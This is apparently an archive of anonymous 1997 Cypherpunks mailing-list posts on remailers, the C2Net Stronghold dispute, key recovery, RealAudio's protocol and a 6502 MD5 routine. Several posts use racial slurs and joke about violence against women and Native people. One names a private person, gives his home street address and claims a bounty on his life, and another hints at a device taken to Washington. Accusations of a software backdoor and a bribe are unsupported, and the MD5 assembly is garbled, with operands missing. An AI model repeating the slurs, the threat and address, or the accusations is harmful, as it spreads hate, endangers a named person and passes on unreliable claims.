This idea has been around since remailers began.  The basic premise is that
a group of remailers are set up which only accept mail from other remailers.
A pinging system can be set up to verify that all the remailers are
operating correctly.
The catch is that in practice each remailer is only required to accept mail
from other remailers, but can actually accept mail from anybody the operator
wants to.  So if you don't want to run a remailer, just pay someone to run a
remailer on your behalf, and then you can send anonymous messages through
that person's site.
Thus forwarding within the remailer network is free, but it costs money to
insert new messages.  This scheme is a little more flexible than attaching
ecash to each message because you can arrange any type of fee schedule you
like, such as a flat rate per month.
There's also the reverse of this, where remailers accept from anyone, but
only send to other remailers.  Thus you have to pay to get your messages
out of the remailer network.  This is more restrictive because the payment
must be anonymous.
Sign up with an ISP that offers alt.anonymous.messages.  This one is a
no-brainer. (and profitable for the ISP)
This results in a system where sending messages is essentially free (since
free remailers exist) but it costs money to receive them.  So far it seems
to be successful, at least for those who pay a flat fee for usenet access.

@_date: 1997-10-03 18:44:04
@_author: Anonymous 
@_subject: Low blow (but a *good* one!) 
You have a nerve. You, coming from a country where people are still
regularly killed in the name of racism, tell me this?!
The Same Old Guy replied:
Want the cold, hard facts of life, Bubba?
You didn't put WWII 'behind' you. We did!
Gun-loving Americans conquered your continent and gave you your
countries back instead of enslaving you, like every other winner in
history has done.
*** Certified Low Blow ***
Some of us discriminate against Jews. Do you know why? Because we HAVE some!
*** Certified Low Blow ***
We were giving them refuge while Europe was massacring them by the
millions. Now you have the balls to say we're not all treating them
right all of the time.
Buy a fucking clue!

@_date: 1997-10-04 05:21:56
@_author: Anonymous 
@_subject: Guilt 
Monty Cantsin is feeling a bit guilty about starting this.  While
there is some value in taking the smug Europeans down a few notches,
it is beginning to look as if some Americans need to be taken down a
few notches as well.
"The Secret War Against the Jews: How Western Espionage Betrayed the
Jewish People" by John Loftus and Mark Aarons.
Pages 49-50:
  "In 1943 the Holocaust was in full operation, but in April of that
year in Bermuda, a conference of British and American officials
formally decided that nothing should be done about it.  They 'ruled
out all plans for mass rescue.'  The British Foreign Office and the
U.S. State Department were both afraid that the Third Reich would be
quite willing, indeed eager, to stop the gas chambers, empty the
concentration camps, and let hundreds of thousands, if not millions,
of Jewish survivors emigrate to freedom in the West.  The Foreign
Office 'revealed in confidence' to the State Department its fear that
Hitler might permit a mass exodus.  If approaches to Germany to
release Jews were 'pressed too much that is exactly what might
  "The bigoted reality behind the Secret Report of the Easter 1943
Bermuda Conference was that not a single Allied nation wanted to let
teh Jews settle in its country.  The unspoken consensus was that it
was better to let Hitler handle them than arrange a mass evacuation to
the United States, England, or Canada.  In short, the Jews were
expendable to the war effort.[47] Only after the war was it confirmed
that a rescue operation to the Nazi concentration camps could have
been successful.  'Marshal of the RAF Sir Arthur `Bomber` Harris
declared afterwards that a rescue plan was `perfectly feasible, but I
was never asked to undertake it.`'[48]
  "No one campaigned to rescue the Jews because the leaders of the
Western nations had deliberately withheld the truth about the
Holocaust from their own citizens.  After verification by each of the
Allied intelligence services, the body counts of murdered Jews were
quietly classified as early as September 1941."
Pages 70-71:
  "Ibn Saud had no intention of ever letting a single Jew emigrate to
Palestine.  President Roosevelt discovered this for himself, but too
  "In February 1945, just before he died, President Roosevelt
personally met Ibn Saud.  He attempted to enlist the king's support
for the Zionist solution, but Ibn Saud firmly rejected the idea,
instead suggesting that the Allies should give 'them and their
descendants the choicest lands and homes of the Germans who oppressed
them' or that the Allied countries take in the Jews themselves.[57]
  "The king's vehement opposition to Jewish migration was a bit of a
shock to Roosevelt, who was strongly sympathetic to the Zionist cause.
Yet none of the Western nations was ever prepared to take more than a
handful of Holocaust survivors.  As one book showed, the Canadian
policy was 'none is too many.'  The king seemed to recognize this, and
he reminded Roosevelt that Palestine had already taken 'its fair share
of refugees from Europe.'
  "Suddenly the president's sympathy for the Jews was wavering.  He
told Ibn Saud that 'he would do nothing to assist the Jews against the
Arabs and would make no move hostile to the Arab people.'  Roosevelt's
new policy was to be netural, but neutral in favor of the Arabs.[58]
It was an uncomfortable lesson for the ailing president.  The choice
seemed clear enough.  The United States could help the Jews found
their home in Palestine, or it could have Saudi Arabia's oil as the
engine room for postwar dominance.  It seemed to Roosevelt that could
not have both.  He chose oil."
Footnotes, Chapter 2:
[46] David Wyman, "The Abandonment of the Jews" (New York: Pantheon,
     1984), p. 342
[47] For accounts of the official policies of the various Allied
     governments, see Walter Laqueur, "The Terrible Secret" (London:
     Weidenfeld & Nicolson, 1981); and Martin Gilbert, "Auschwitz and
     the Allies" (London: Michael Joseph/Rainbird, 1981).
[48] Ricahrd Deacon, "The Israeli Secret Service" (London: Sphere,
     1979), p. 29.
Footnotes, Chapter 3:
[57] The king's ". . . firmness disconcerted Roosevelt, who seems to
     have believed a few hours' personal chitchat and some lavish
     Lend-Lease assistance would win the King of Arabia to his
     purpose.
         "The president tried another tack.  He was counting on the
     legendary hospitality of the Arab, he said, to help solve the
     problem of Zionism.  But [the king] did not see why the Arabs of
     Palestine should feel especially hospitable towards the Jews.
          "'Make the enemy and the oppressor pay,' he said; 'that is
     how we Arabs wage war.'
          "It was not the Arabs of Palestine who had massacred the
     Jews.  It was the Germans and, as 'a simple bedouin,' the Sa'udi
     king could not understand why the president seemed so eager to
     save Germany from the consequences of its crimes. . . ."  Kelly,
     "Arabia, the Gulf and the West" (New York: Basic Books, 1980),
     pp. 271-272.
[58] Returning to Washington, a chastened Roosevelt told Congress that
     "from Ibn Saud, of Arabia, I learned more of the whole problem of
     the Moslems and more about the Jewish people in 5 minutes than I could
     have learned by the exchange of a dozen letters." Ibid., p. 272.
Monty Cantsin
Editor in Chief
Smile Magazine

@_date: 1997-10-04 12:58:20
@_author: Anonymous 
@_subject: Stanglehold / Re: Stronghold 
Let's think about this for a moment.
RSA is so confident in their product that they openly challenge people to prove its strength or weakness, even offering them money
out of their own pocket if they cn do so.
C2Net, at the merest whisper by the least credible of persons, launches into action an army of litigators to threaten said
individual with dire consequences if they fail to duck and cover,
not to mention 'shut the fuck up.'
If I had evidence of a backdoor in C2Net's Stronghold software, and I met with so little support when attacked by them, I would refuse to
post it.
Why? To let all of C2Net's staunch defenders feel all the more confident
in placing their big, hairy balls in the StrangleHold of C2Net's
Of course, if I were C2Net and I *did* have a backdoor built into my
software, I would probably try to link any criticism of my product with
the rantings of mentally unstable paranoics.
Which begs the question, is Dimitri the 'foil' of C2Net, or a 'creation'
of C2Net?
"Creator of the 2-way mirror."

@_date: 1997-10-04 13:37:35
@_author: Anonymous 
@_subject: FBI trainees good, nab innocent teen-agers 
CNN logo
   [ISMAP]-Navigation
   Infoseek/Big Yellow
   Pathfinder/Warner Bros
   Main banner AST. Working For Your Business.
                                    rule
                  FBI trainees goof, nab innocent teen-agers
     October 3, 1997
     Web posted at: 9:35 p.m. EDT (0135 GMT)
     ELIZABETHTOWN, Pennsylvania (AP) -- Armed FBI trainees in
     bulletproof vests and camouflage surrounded a group of teen-agers,
     handcuffed them and forced them to the ground before realizing they
     had the wrong people.
     The trainees were taking part in a training exercise at a town
     square Wednesday night in which they were apparently supposed to
     nab others taking part in the drill.
     Instead, up to 30 FBI trainees jumped out of a caravan of vehicles
     and descended on the innocent teen-agers, bound their wrists with
     plastic ties and ordered them to lie face-down on the sidewalk.
     After about 30 minutes, the agents set the teens free.
     The FBI would not comment on the specifics of the drill, but an FBI
     official apologized Friday and two agents visited the home of one
     of the youths Thursday night to express their regrets.
     Copyright 1997   The Associated Press. All rights reserved. This
     material may not be published, broadcast, rewritten, or
     redistributed.

@_date: 1997-10-05 01:03:46
@_author: Anonymous 
@_subject: Regulate them to 'double-death'... 
No, instead, Canadian students terrorize each other with old-fashioned
forms of violence, like at Cole Harbor high school in Newfie'land, where
they use baseball bats to keep the niggers in line, and in Montreal,
where four teenagers have been driven to suicide in the last few weeks
by the 'taxing' they have endured from the youth gangs that roam the
Perhaps Canada needs 'more' regulation...

@_date: 1997-10-05 06:40:12
@_author: Anonymous 
@_subject: Fucking Deadbeats! 
I saw on the news today that the Canadian Federal Bank (whatever it is
called) decided to raise interests rates recently, because they were
afraid that the economy was becoming "too robust."
Would anyone like to bet that this little tidbit of information is not
likely to help those who Unemployment Insurance Commission workers call
deadbeats because they can't find a job?

@_date: 1997-10-05 07:49:18
@_author: Anonymous 
@_subject: Regulate them to 'double-death'... 
The same is true of most places, even the ones known as being
dangerous enclaves of the 'bad' people.
  The fact is, those who live in any given area generally do not
feel too threatened when going out and about in 'their' part of
town.   I spend time in the areas of Regina, Saskatchewan and Oakland,
California, that most of the 'regular' folk avoid. I have seen
people shot and stabbed in both places, but I feel safe enough to
walk those streets alone.
  I have been robbed a couple times in both areas, and have given
up the cash I was holding, even when I was armed much better than
those robbing me. I didn't feel like killing them.
  Kiss my ass. Racial discrimination is not *recognized* in the communities at large.
  I like to use the word 'nigger' as often as possible in Berkeley,
California, (a prison for the politically correct) just because it
pisses all of those oh-so-liberal hypocrites who shit their pants
when a black person moves into *their* neighborhood.
  I like to use the word 'wagon-burner' in Regina when dealing with
social workers who use the politically correct term, Native Canadian
while they discriminate against the 'wagon-burners' in every possible
Joke heard in a Canadian Bar at 11:37 pm, Sat. Oct. 3, 1997:
Q: "What do you call a woman with two black eyes?
A: "Nothing. She's been told *twice* already!"
  No. The fact that I did not list the 'volumes' of examples of teen
violence in Canada is newsworthy.
  Sounds like the typical *American* gun owner.
  Canadians whack out fewer people with weapons than Americans, but so do people in prison. Go figure...
  Canada does not have the magnitude of problems that the US has because there are only about 20 million people in the whole goddamn
country, and there are not nearly as many hugely populated cities.
  As well, Canadians spend a great amount of their time huddled inside their igloos during the year, and are too busy trying to
keep warm to spend much time murdering their fellow citizens.
  Got to run. I'm a cop, and I haven't beaten up my quota of wagon-burners for the day.

@_date: 1997-10-05 10:49:46
@_author: Anonymous 
@_subject: Stronghold 
Unless C2Net publicly announces that Dimitri is free to post anything he chooses about C2Net and the software they produce,
without threat of lawsuit or prosecution, then it is patently
unfair to castigate him for failing to share whatever information
he may have in regard to their product.
Like it or not, C2Net has declared that the integrity of their
product is dependent upon men with guns who have the power to
take people before the inquisitors, squelching all intimations
of weakness or impropriety in the design of their product.
If Ray Arachelian sues Dimitri for libel, I will start wondering
just how many people he has, indeed, murdered.
(Nothing personal, Ray, but are you *sure* that stain on your tie
 is ketchup?)
"Take a byte out of slime."

@_date: 1997-10-05 20:30:45
@_author: Anonymous 
@_subject: Stronghold 
}>> Dimitri:
}>> Perhaps this is unfair, but it now appears that you are using
}>> the disputed censorship issue to cloud your reluctance, or
}>> inability, to substantiate a fault in Stronghold.
}>Unless C2Net publicly announces that Dimitri is free to post
}>anything he chooses about C2Net and the software they produce,
}>without threat of lawsuit or prosecution, then it is patently
A "public announcement" by the proven liars at C2 doesn't constitute a
release from liability and wouldn't do much, legally, to protect Vulis
from harrassment lawsuits. C2 can turn around and sue Vulis anyway.
"So, I lied. Again." - Sameer
}>unfair to castigate him for failing to share whatever information
}>he may have in regard to their product.
}>Like it or not, C2Net has declared that the integrity of their
}>product is dependent upon men with guns who have the power to
}>take people before the inquisitors, squelching all intimations
}>of weakness or impropriety in the design of their product.
}Use the remailers.  That's what they're there for.  Am I being overly
}simplistic here?
If someone other than Vulis (me, for instance) published the Stronghold
backdoor (widely known by now) via an anonymous remailer, then Sameer
Parekh could still sue Vulis for having discovered it first, or to
"make example" of him, and to intidimate other security experts who
are aware of Stronghold's many holes.
For example, Sandy Sandfort, Parekh's marketing director, wrote to Vulis:
}       ... we'll slap a libel suit across your emigrant ass, take back
}your green card, deport you and tell Russia that you called Yeltsin a
}cocksucker ...
C2 is obviously deperate to suppress the information that's already known to
an increasing number of people in the field. Their threats against Vulis may
be one of the reasons why none of the security experts, who confirmed the
presense of serious security flaws in Stronghold, are saying much about this.
The BackdoorMonger

@_date: 1997-10-06 00:59:11
@_author: Anonymous 
@_subject: Stronghold 
It is becoming increasingly obvious that John Young is the real
troublemaker here. I wouldn't doubt that it was John who was
behind the original troubles between Vulis and Sameer.
I think that John Young should be forcefully unsubscribed from
the Cypherpunks mailing lists.

@_date: 1997-10-06 05:08:33
@_author: Anonymous 
@_subject: Quor's cipher 
Even in the case where this doesn't work, you can simply collect all
128 plaintext/ciphertext pairs for the first byte (if you can get
enough known plaintexts)

@_date: 1997-10-06 06:55:08
@_author: Anonymous 
@_subject: Pretty Good Piracy 
It's the only weakness that's needed to compromise all the keys.
I don't have any problem with the feature, only with the use of the PGP reputation capital to directly promote it. If they wanted to call it 'Pretty Corporate Privacy' then the name would reflect its purpose.
Security, in regard to privacy, is an all-or-nothing issue. As such, I do not find it acceptable to apply the same standards of promotion
and dissemination as with less important types of software.
The fact of the matter is, the product has nothing to do with the
privacy of the individual using it, only the privacy of the
corporation. This is an important distincion which should not be
subject to confusion with a product by the same name which is noted
for providing a secure level of privacy for the individual.
I would wager that promoting a false sense of security, or an incorrect
view of the levels of security and trust involved in company software
will do more damage than the occassional loss of keys will.
Again, the product does not provide 'Pretty Good Privacy,' it does
provide 'Pretty Corporate Privacy.'

@_date: 1997-10-06 13:35:27
@_author: Anonymous 
@_subject: Sameer Parekh and C2Net offer a $50,000 reward for the killing of Zionist Vulis 
Allah akbar!  God is great! Sameer Parekh and C2Net have placed a $50,000
contract on the life of the miserable Zionist Dimitri Vulis residing at:
 67-67 Burns St
 Forest Hills, NY 11375
 U.S. of A.
Sameer Parekh is the official supplier of cryprographic software to the
Palestine Liberation Organization and Hamas.
Death to the Zionist aggressors!  Death to Vulis!  God is great!

@_date: 1997-10-06 13:42:04
@_author: Anonymous 
@_subject: Sameer Parekh and C2Net offer a $50,000 reward for the killing of Zionist Vulis 
This would explain the "Infidel Inside!" sticker on the Stronghold
software packaging.

@_date: 1997-10-06 14:23:47
@_author: Anonymous 
@_subject: Transmission Management 
(This feature is independent of the GAK aspects of the product.)
It's probably a good idea to set up your mailer so that it discourages
transmission of unencrypted mail.  This could be as simple as a
sequence of questions: "Do you want to do this?", "Do you really want
to do this?", and "Are you absolutely one hundred percent sure that it
is a good idea to put this message on tape at Fort Meade for
eternity?"  But, you could make more amusing warnings.  For example,
the mailer could convert your message into a front page article for
the New York Times and show you what it will look like.
Agencies which handle encrypted communications typically track every
message sent.  We should do the same thing.  Most people probably do
this in an informal way, but really slick tools for doing this would
have their uses.
This is especially true when managing an identity.  Not only would it
be nice to track every transmission in a nice easy to assess way, but
also track exactly how it was transmitted, the precise time of
transmission, and the remailers used to deliver it.
This raw information would be neat to have, but it wouldn't get really
useful without an analysis tool.  For instance, you could see how much
your identity depends on the security of certain remailers.  If you
use one remailer in your chains a lot, you might want to have
something which warns you that you are becoming overly dependent on
that remailer.  Or, you might want to run "what if" scenarios to see
if you would be vulnerable if a particular set of remailers were
If the analysis tool were really good, it would hunt for weaknesses
based on known remailer attacks.
And, naturally, for proper identity management it would be important
to keep a running score for the odds that each identity were
compromised and by which threats.
Monty Cantsin
Editor in Chief
Smile Magazine

@_date: 1997-10-06 20:03:18
@_author: Anonymous 
@_subject: C2Net offers Vulis $100,000 for not talking about Stronghold 
Sameer Parekh called Dmitry Vulis on the phone today and offered him
$100,000 if Vulis promises not to publicize the security flows that
Vulis has found in Stronghold, C2Net's only remaining product.

@_date: 1997-10-07 03:34:03
@_author: Anonymous 
@_subject: The Important Question / Re: russia_1.html 
But the _important_ question is: "Where do connect the 'yellow' wire?"

@_date: 1997-10-09 01:09:08
@_author: Anonymous 
@_subject: Thanks Peter! / Re: russia_1.html 
I lost your email address when I spilled Scotch on my computer and
lost all my data, so I thought I'd send this to the CypherPunks list.
 Thanks for explaining to me how to decide where the 'yellow' wire
goes. My 'you know what' ought to work now (but I'm not going to
try it at home, kids...heh...heh).
  I'm going to go to Washington as soon as I get my cast off. I left
in on an extra week since I make more money spare-changing since I
got it, and now I have enough to take a bus to 'you know where,' DC.
  Tell Declan that he should probably go visit his mom, or something,
like next Friday, until at least Monday (because that's when my mom
leaves Washington, 'you know where.'--{boy, is *she* going to be
sorry she grounded me on my uncle's weekend away from the 'Home'.})
  My uncle's going to be mad when he finds out I took his suitcase,
but he couldn't even get his Heathkit radio to work, and I *almost*
did. Besides, you should never trust anyone over fifteen, eh?
(And these things are dangerous in the wrong hands, eh?)
Human Gus-Peter
p.s. - Cynthia still hasn't answered me as whether or not she is
  wearing any panties. Is she stuck-up, or something?
p.p.s. - I wonder if Dimitri thinks its suspicious that your first
  name is the same as my last one. Of course, if he thought we were
  doing what John-John do, then ? the Playpus would call you a
  pedal-file, eh? (Unless you were doing it to a girl my age, and
  then he would call you a 'petal-file.') {<-- that's a sexist joke}

@_date: 1997-10-09 10:27:28
@_author: Anonymous 
@_subject: access to storage keys, NOT comms keys! 
Here is what leading cryptographers say about email key recovery, from
  This includes respected
figures like Bruce Schneier, Matt Blaze, Ron Rivest, Ross Anderson,
Whit Diffie, and more.
   2.1 Communication Traffic vs. Stored Data
   While key ``recoverability'' is a potentially important added-value
   feature in certain stored data systems, in other applications of
   cryptography there is little or no user demand for this feature. In
   particular, there is hardly ever a reason for an encryption user to want
   to recover the key used to protect a communication session such as a
   telephone call, FAX transmission, or Internet link. If such a key is lost,
   corrupted, or otherwise becomes unavailable, the problem can be detected
   immediately and a new key negotiated. There is also no reason to trust
   another party with such a key. Key recoverability, to the extent it has
   a private-sector application at all, is useful only for the keys used
   to protect irreproducible stored data. There is basically no business
   model for other uses, as discussed below.
   In stored data applications, key recovery is only one of a number of
   options for assuring the continued availability of business-critical
   information. These options include sharing the knowledge of keys
   among several individuals (possibly using secret-sharing techniques),
   obtaining keys from a local key registry that maintains backup copies,
   careful backup management of the plaintext of stored encrypted data, or,
   of course, some kind of key recovery mechanism. The best option among
   these choices depends on the particular application and user.
   Encrypted electronic mail is an interesting special case, in that it
   has the characteristics of both communication and storage. Whether key
   recovery is useful to the user of a secure E-mail system depends on
   design of the particular system.
   The government, on the other hand, proposes a key recovery infrastructure
   that applies to virtually all cryptographic keys, including (especially)
   those used to protect communications sessions.
They say that key recovery is not appropriate for transient keys used
during a communication session.  However, email is a special case, having
characteristics of both communication and storage.  In some systems,
email may be archived for long periods of time in the same format that
it was received.  For such systems there is a business case for key
recovery in email.

@_date: 1997-10-09 10:31:37
@_author: Anonymous 
@_subject: NoneRe: russia_1.html 
The pit usually contains beryllium-9 and an alpha source.  When beryllium-9
is struck by an alpha particle it will eject a neutron.  Tritium is rather
useless for this purpose as it is a beta emitter and betas do not have
enough energy to eject neutrons from anything.  The reason the pit goes bad
is because you need to be able to produce a large number of neutrons in a
short period of time, so you need a very strong alpha emitter (stronger
than the Pu239) which means it will decay more rapidly.  Furthermore, those
neutrons are going to find their way into various nuclei and transmutate
them into things you don't want.
The reason the pit is necessary is that Pu is too fast - the critical
mass will blow itself apart just as the reaction is getting underway.  To
avoid this "fizzle", an implosion bomb is used which squeezes the Pu core
and holds it there long enough for it to react.  Once the critical mass
is assembled you want to make sure it actually blows.  If there aren't any
free neutrons during that split-second then it won't explode.  So that's
what the 'pit' is for.

@_date: 1997-10-09 11:01:40
@_author: Anonymous 
@_subject: MISTY algorithm source code 
Interesting. The "Crow" algorithm seems to do nothing but return "BITE
ME!" for any plaintext, the "Tom Servo" algorithm converts ciphertext
into hip neologisms, and the "Gypsy" algorithm turns unintelligible
plaintext into unintelligible ciphertext and vice versa.
Memo to self: Fire Chief Programmer Mike Nelson.

@_date: 1997-10-09 19:20:31
@_author: Anonymous 
@_subject: No Subject 
The Government routinely lies to the citizens it allegedly represents.
It infringes on the rights guaranteed those citizens by the Constitution.
The FCC can't allocate radio bandwidth efficiently, byt they seem to have
no problem telling Howard Stern not to say "vagina" on the radio. I could
go on and on, ad nauseam, but you get the idea.
If this is their best effort, they should be horsewhipped, tarred, feathered, and run out of town on a rail. Unfortunately, the brain-dead
populace continues to get hypnotized by their Pied-Piper tales and
makes the biennial Bataan death march to the polls (nice double
entendre there, n'est-ce pas?) to choose between Picto Bold and Picto
Light, the two candidates in their district who have a single common
goal: to get elected to an office where they can get a firm lip clamp
on the teat of the American taxpayer, and skim off the lobbyists in
their spare time. Neither one really gives a flying fuck about the
people they represent; it's the power they want.
Why would I want to do anything for the Government? I already pay them
a tithe (oh, sure, you can call it "income tax") to stay the fuck away
from me, by and large. As soon as someone shows up at my door and says "Hi, I'm here from the
Government to help you," I'm running for my life. That kind of "help"
usually results in gunfire, or dependence on further Government subidies,
or having mopey Government types hang around to explain to me that I should
use water-based varnish so I don't wreck the ozone layer.
None of us need your pity. And wipe your chin when you're done. And say
"hi" to Mr. Freeh next time you see him. Of course, it won't be his
face that'll be at eye level. . .

@_date: 1997-10-10 00:35:59
@_author: Anonymous 
@_subject: Object code disassembly (was Re: [LONG, off-topic]] Interactive Programming) 
Not quite that easy.
Awhile back I disassembled RealAudio because I was curious how their codec
worked.  Turns out it was not all that interesting and the codecs in
nautilus and speak freely are probably better.  But anyway....
Running objdump on the binary spit out ~800000 lines of code.  They
statically linked the whole thing, motif, c library, and all.  I'm not
sure what they compiled it with, the c-library they had in there didn't
look like any of the standard ones.
It disassembled fine, but 800k lines of assembler dump is not really all
that readable.  So I ended up doing it interactively, setting breakpoints
on the I/O operations and backtracing to find the coder.  The user
interface code tended to get in the way a lot.
The 1kb/s coder is very basic.  No predictor/corrector, and no redundancy
(eg lempel-ziv, rle) compression at all.  It's just a frequency/band coder
at 10 frames per second.  I guess thats so it can handle dropped frames.
No checksums at all.
The "28.8" codec is more sophisticated.  It appears to be a LPC and
compresses data into much larger blocks/packets.  I didn't look into it
too deeply because there are lots of other lpc coders available.
Shortly after this, they put out a new version 3.0, with yet another
codec, which I never looked at.  This was quite awhile ago, and all this
is from memory.
So the codec was rather uninteresting, but there were a number of other
"features" which got my attention.
I looked at the network protocol.  Its pretty simple.  The client connects
to the server and requests the file it wants.  It also sends a whole
bunch of other info, like host operating system, version number, etc.
("for statistical purposes, right?  uh huh..."  are you guys over there
at anonymizer.com reading this?  hint, hint.)
Then it does something truly bizarre.
The client and server exchange 32-digit hex numbers.  The client calls
gettimeofday() and gethostname() and uses this as a random seed.  Then
it sends a 128-bit random number, encoded as 32 ascii hex digits.  The
server does the same.
I haven't a clue what this is for.  Considering that the other data
structures are all binary, sending this as ascii is really dumb.  It looks
as though its part of some third-party library.  I thought maybe it was
some variant of netscape cookies but it doesn't save anything to disk. It's just wierd.  I tried stepping through this section of code a few
times, but doing so usually caused the server to time-out.
Then the server starts sending the audio file as one big stream of
packets - same format as the files it saves to disk, just broken up into
packets, each preceeded by a length byte.  In udp mode the client sends
acks every second or so.  In tcp mode there are no in-band acks at all,
it relies solely on the tcp protocol driver.  No checksums on anything,
and it uses predictable port numbers.  You can probably spoof it real
easy.  That might make for an interesting prank.

@_date: 1997-10-10 03:45:23
@_author: Anonymous 
@_subject: 6502 ML programming 
If you guys are still doing 6502 work, maybe you can make use of this.
* RSA Data Security, Inc. MD5 Message-Digest Algorithm
*  ***********************************************************************
*  **  Message-digest routines:                                         **
*  **  To form the message digest for a message M                       **
*  **    (1) Initialize a context buffer mdContext using MD5Init        **
*  **    (2) Call MD5Update on mdContext and M                          **
*  **    (3) Call MD5Final on mdContext                                 **
*  **  The message digest is now in the bugffer passed to MD5Final      **
*  ***********************************************************************
 ORG $2000
* Jump Table
 JMP MD5INIT
 JMP MD5UPD
 JMP MD5FINAL
DIGEST HEX 00000000 ;Message digest ends up here.
 HEX 00000000
 HEX 00000000
 HEX 00000000
MD5INITV HEX 01234567 ;MD5 initialization values
 HEX 89ABCDEF
 HEX FEDCBA98
 HEX 76543210
MD5BYTES DS 8 ;Counts bytes in message digest so far
MD5BUFRP HEX 00 ;Pointer to current byte in partially full buffer
MD5BUFR DS 64 ;64-byte buffer for current MD5 block
* Initialize MD5 - start new message digest
MD5INIT LDX  ;Load initialization constants
]LOOP LDA MD5INITV,X
 STA DIGEST,X
 DEX
 BPL ]LOOP
 LDA  ;Reset byte count to zero
 LDX ]LOOP STA MD5BYTES,X
 DEX
 BPL ]LOOP
 STA MD5BUFRP ;Reset buffer to empty
]RTS RTS
* MD5UPD - add a byte to the message digest
MD5UPD LDX MD5BUFRP
 STA MD5BUFR,X
 INX
 STX MD5BUFRP
 JSR INCBYTES
 CPX  BCC ]RTS
 LDX  STX MD5BUFRP
 JSR MD5DOBLK
 RTS
INCBYTES INC MD5BYTES
 BNE ]RTS
 INC MD5BYTES+1
 BNE ]RTS
 INC MD5BYTES+2
 BNE ]RTS
 HEX 0000
* MD5FINAL - do last block and compute final digest
MD5FINAL LDA  LDX MD5BUFRP
 STA MD5BUFR,X
 INX
 STX MD5BUFRP
]LOOP CPX  BCC MD5FA
 LDX  STX MD5BUFRP
 JSR MD5DOBLK
MD5FA LDX MD5BUFRP
 LDA  STA MD5BUFR,X
 INX
 STX MD5BUFRP
 CPX  BNE ]LOOP
 LDA MD5BYTES
 STA MD5BUFR+56
 LDA MD5BYTES+1
 STA MD5BUFR+57
 LDA MD5BYTES+2
 STA MD5BUFR+58
 LDA MD5BYTES+3
 STA MD5BUFR+59
 LDA MD5BYTES+4
 STA MD5BUFR+60
 LDA MD5BYTES+5
 STA MD5BUFR+61
 LDA MD5BYTES+6
 STA MD5BUFR+62
 LDA MD5BYTES+7
 STA MD5BUFR+63
 LUP 3 ;Multiply times 8
 LDA MD5BUFR+56 ; to convert number of bytes to number of bits
 ASL
 STA MD5BUFR+56
 LDA MD5BUFR+57
 ROL
 STA MD5BUFR+57
 LDA MD5BUFR+58
 ROL
 STA MD5BUFR+58
 LDA MD5BUFR+59
 ROL ;Unlikely the message would be over 500 MB
 STA MD5BUFR+59 ;so we can stop here...
 --^
 JSR MD5DOBLK
 RTS
MD5TEMPB DS 16 ;Temporary buffer for a,b,c,d
MD5TEMPV DS 4 ;Temporary 32-bit word storage (used by MD5DOBLK)
MD5TEMP2 DS 4 ;Temporary 32-bit variable  (used by F,G,H,I fcns)
* Block transformation
MD5DOBLK LDX  ;Copy values into temp buffer
]LOOP LDA DIGEST,X
 STA MD5TEMPB,X
 DEX
 BPL ]LOOP
 LDA  STA MD5TP
* Round 1 : F-functions
*           a = b + ((a + F(b,c,d) + X[k] + T[i]) <<< s). */
 JSR MD5LOADA ;1  (a,b,c,d)
 JSR F_BCD
 JSR NEXT_T ;(D76AA478)
 LDA  JSR MD5ADDX
 JSR MD5RL7 ;Rotate Left 7
 JSR MD5ADDB
 JSR MD5STORA
 JSR MD5LOADD ;2  (d,a,b,c)
 JSR F_ABC
 JSR NEXT_T ;(E8C7B756)
 LDA  JSR MD5ADDX
 JSR MD5RL12 ;Rotate Left 12
 JSR MD5ADDA
 JSR MD5STORD
 JSR MD5LOADC ;3  (c,d,a,b)
 JSR F_DAB
 JSR NEXT_T
 LDA  JSR MD5ADDX
 JSR MD5RL17 ;Rotate left 17
 JSR MD5ADDD
 JSR MD5STORC
 JSR MD5LOADB ;4  (b,c,d,a)
 JSR F_CDA
 JSR NEXT_T
 LDA  JSR MD5ADDX
 JSR MD5RL22 ;Rotate left 22
 JSR MD5ADDC
 JSR MD5STORB
 JSR MD5LOADA ;5  (a,b,c,d)
 JSR F_BCD
 JSR NEXT_T
 LDA  JSR MD5ADDX
 JSR MD5RL7 ;<<7
 JSR MD5ADDB
 JSR MD5STORA
 JSR MD5LOADD ;6  (d,a,b,c)
 JSR F_ABC
 JSR NEXT_T
 LDA  JSR MD5ADDX
 JSR MD5RL12 ;<<12
 JSR MD5ADDA
 JSR MD5STORD
 JSR MD5LOADC ;7  (c,d,a,b)
 JSR F_DAB
 JSR NEXT_T
 LDA  JSR MD5ADDX
 JSR MD5RL17 ;<<17
 JSR MD5ADDD
 JSR MD5STORC
 JSR MD5LOADB ;8  (b,c,d,a)
 JSR F_CDA
 JSR NEXT_T
 LDA  JSR MD5ADDX
 JSR MD5RL22 ;<<22
 JSR MD5ADDC
 JSR MD5STORB
 JSR MD5LOADA ;9  (a,b,c,d)
 JSR F_BCD
 JSR NEXT_T
 LDA  JSR MD5ADDX
 JSR MD5RL7
 JSR MD5ADDB
 JSR MD5STORA
 JSR MD5LOADD ;10  (d,a,b,c)
 JSR F_ABC
 JSR NEXT_T
 LDA  JSR MD5ADDX
 JSR MD5RL12
 JSR MD5ADDA
 JSR MD5STORD
 JSR MD5LOADC ;11  (c,d,a,b)
 JSR F_DAB
 JSR NEXT_T
 LDA  JSR MD5ADDX
 JSR MD5RL17
 JSR MD5ADDD
 JSR MD5STORC
 JSR MD5LOADB ;12  (b,c,d,a)
 JSR F_CDA
 JSR NEXT_T
 LDA  JSR MD5ADDX
 JSR MD5RL22
 JSR MD5ADDC
 JSR MD5STORB
 JSR MD5LOADA ;13  (a,b,c,d)
 JSR F_BCD
 JSR NEXT_T
 LDA  JSR MD5ADDX
 JSR MD5RL7
 JSR MD5ADDB
 JSR MD5STORA
 JSR MD5LOADD ;14  (d,a,b,c)
 JSR F_ABC
 JSR NEXT_T
 LDA  JSR MD5ADDX
 JSR MD5RL12
 JSR MD5ADDA
 JSR MD5STORD
 JSR MD5LOADC ;15  (c,d,a,b)
 JSR F_DAB
 JSR NEXT_T
 LDA  JSR MD5ADDX
 JSR MD5RL17
 JSR MD5ADDD
 JSR MD5STORC
 JSR MD5LOADB ;16  (b,c,d,a)
 JSR F_CDA
 JSR NEXT_T
 LDA  JSR MD5ADDX
 JSR MD5RL22
 JSR MD5ADDC
 JSR MD5STORB
* Round 2 : G-functions
*           a = b + ((a + G(b,c,d) + X[k] + T[i]) <<< s). */
 JSR MD5LOADA ;17  (a,b,c,d)
 JSR G_BCD
 JSR NEXT_T
 LDA  JSR MD5ADDX
 JSR MD5RL5 ;Rotate Left 5
 JSR MD5ADDB
 JSR MD5STORA
 JSR MD5LOADD ;18  (d,a,b,c)
 JSR G_ABC
 JSR NEXT_T
 LDA  JSR MD5ADDX
 JSR MD5RL9 ;Rotate Left 9
